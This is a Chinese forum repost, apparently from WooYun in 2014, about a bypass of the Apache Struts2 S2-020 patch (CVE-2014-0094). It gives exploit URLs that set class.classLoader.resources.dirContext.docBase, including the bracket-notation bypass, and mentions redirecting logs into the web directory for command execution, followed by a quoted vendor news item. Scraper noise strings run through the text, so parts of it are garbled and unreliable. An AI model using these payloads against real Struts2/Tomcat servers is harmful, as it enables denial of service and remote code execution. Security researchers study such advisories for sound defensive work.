之前S2-020漏洞利用方式见drops:Struts2 Tomcat class.classLoader.resources.dirContext.docBase赋值造成的DoS及远程代码执行利用!
$ ~/ r+ E$ N/ l: ^3 n' U( {! ]& N7 V* ?" ^! z
暂时不清楚到底是谁发出来的补丁绕过。之前 @Nebula 发的Tomcat:- http://127.0.0.1/s/example/HelloWorld.action?class.classLoader.resources.dirContext.docBase=//192.168.x.x/test' N5 U$ q; ~/ C, _
- Q4 a/ F4 F: {. B
[color=rgb(51, 102, 153) !important]复制代码6 m6 `5 A; ~$ J/ H2 p+ a: S* O
2 b ~* y2 O7 U \( B绕过方式是:- http://localhost:8080/Struts2/test.action?class["classLoader"]["resources"]["dirContext"]["docBase"]=xxxxx
$ M4 u7 k* W2 ]/ u& k; W$ ^: w7 r
; q- Z# {2 b6 v" s5 P7 m5 }7 A
[color=rgb(51, 102, 153) !important]复制代码; Y6 d7 M( u, r( M/ ~
- G5 [$ K, Z) m$ ^9 q. k" J顺便说下// netbios协议似乎在仅是windows,linux下貌似不能直接使用这样的协议。之前有发过:[百度安全中心博客-neobyte]Struts2 S2-020在Tomcat 8下的命令执行分析利用切换日志到web目录,有点可行性。 # [; p7 N" e1 f; }
加速乐发了新闻:
4 R! k' E" @9 F, c+ Y2 ?http://jiasule.baidu.com/news/5357a1eebf9efd27e6ecbade/
+ o" ~7 J1 Y, N4 ~; _1 U; K$ j2 E2 H4月23日消息,近日安全研究人员指出Apache Struts2在漏洞公告S2-020里,在处理修复CVE-2014-0094的漏洞修补方案存在漏洞,导致补丁被完全绕过。目前官方在GitHub上对该问题做出了修正。该问题被曝光后,百度加速乐已率先升级了防御规则,目前百度加速乐可独家防御该漏洞。 7 t/ N6 c2 E$ c. G& X9 W% R
4 `5 X% j# }" A( }% F2 B
据了解Struts2已不是第一次出现重大安全事故,去年9月Struts2曝出漏洞,国家多家重要政府网站受到影响,其中不乏部委级网站。此次再次曝出漏洞显现出互联网安全问题的严重性。3 N- e1 i* R% e
* T. u" U8 u; {! d$ R* f
0 @1 `" E4 p( ^* G
, Z6 U: k% c2 R1 e
转载自乌云/ {0 z9 o7 q! i
原文链接:http://zone.wooyun.org/content/11876
- r' M) i8 c8 z! [/ x |
发表于 2014-4-27 19:10:10
收藏
支持
反对